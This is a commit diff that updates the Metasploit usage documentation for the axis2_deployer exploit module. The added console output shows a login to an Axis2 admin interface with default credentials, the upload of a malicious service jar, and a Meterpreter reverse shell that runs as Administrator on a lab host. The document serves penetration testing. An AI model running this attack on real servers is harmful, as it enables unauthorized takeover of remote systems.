land #8154 docs for axis2_deployer

2017-03-27 20:47:22 -04:00 · 2017-03-27 20:47:22 -04:00 · 09214bbb7d
parent 66a585ab41 48a56d8830
commit 09214bbb7d
1 changed files with 26 additions and 22 deletions
--- a/documentation/modules/exploit/multi/http/axis2_deployer.md
+++ b/documentation/modules/exploit/multi/http/axis2_deployer.md
@ -29,30 +29,34 @@ msf exploit(axis2_deployer) > set USERNAME admin
 USERNAME => admin
 msf exploit(axis2_deployer) > set PASSWORD admin123
 PASSWORD => admin123
-msf exploit(axis2_deployer) > show options
-
-Module options (exploit/multi/http/axis2_deployer):
-
-   Name      Current Setting  Required  Description
-   ----      ---------------  --------  -----------
-   PASSWORD  admin123         no        The password for the specified username
-   PATH      /axis2           yes       The URI path of the axis2 app (use /dswsbobje for SAP BusinessObjects)
-   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOST     10.10.155.37     yes       The target address
-   RPORT     8080             yes       The target port
-   SSL       false            no        Negotiate SSL/TLS for outgoing connections
-   USERNAME  admin            no        The username to authenticate as
-   VHOST                      no        HTTP server virtual host
-
-
-Exploit target:
-
-   Id  Name
-   --  ----
-   0   Java
-
 msf exploit(axis2_deployer) > exploit

 [*] Started reverse TCP handler on 10.10.155.39:4444 
+[+] http://10.10.155.37:8080/axis2/axis2-admin [Apache-Coyote/1.1] [Axis2 Web Admin Module] successful login 'admin' : 'axis2'
+[*] Successfully uploaded
+[*] Polling to see if the service is ready
+[*] Sending stage (30355 bytes) to 10.10.155.37
+[*] Meterpreter session 3 opened (10.10.155.39:4444 -> 10.10.155.37:1750) at 2017-03-26 23:33:19 -0500
+
+[*] NOTE: You will need to delete the web service that was uploaded.
+
+[*] Using meterpreter:
+[*] rm "webapps/axis2/WEB-INF/services/mdLFvgMv.jar"
+
+[*] Using the shell:
+[*] cd  "webapps/axis2/WEB-INF/services"
+[*] del mdLFvgMv.jar
+
+
+meterpreter > getuid
+Server username: Administrator
+meterpreter > sysinfo
+Computer    : juan-6ed9db6ca8
+OS          : Windows 2003 5.2 (x86)
+Meterpreter : java/java
+meterpreter > exit
+[*] Shutting down Meterpreter...
+
+[*] 10.10.155.37 - Meterpreter session 3 closed.  Reason: User exit

 ```